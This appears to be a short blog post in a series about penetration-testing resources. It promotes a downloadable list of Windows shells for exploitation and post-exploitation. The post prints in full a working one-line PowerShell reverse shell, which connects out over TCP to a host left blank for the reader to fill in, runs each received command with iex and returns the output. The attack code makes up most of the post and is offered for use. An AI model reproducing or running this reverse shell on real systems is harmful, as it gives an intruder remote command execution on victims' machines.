Under Utilized Tools/Resources #54

A quick and easy resource to add to your commands list or to bookmark for future penetration tests.

This one is for exploitation/post-exploitation.

It is a list of Windows shells.

For example here is a one-line powershell shell

$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Leech proof unless you know the obvious information to change within it :p

Download them all with the link below


Read all the entries in this series!


Leave a Reply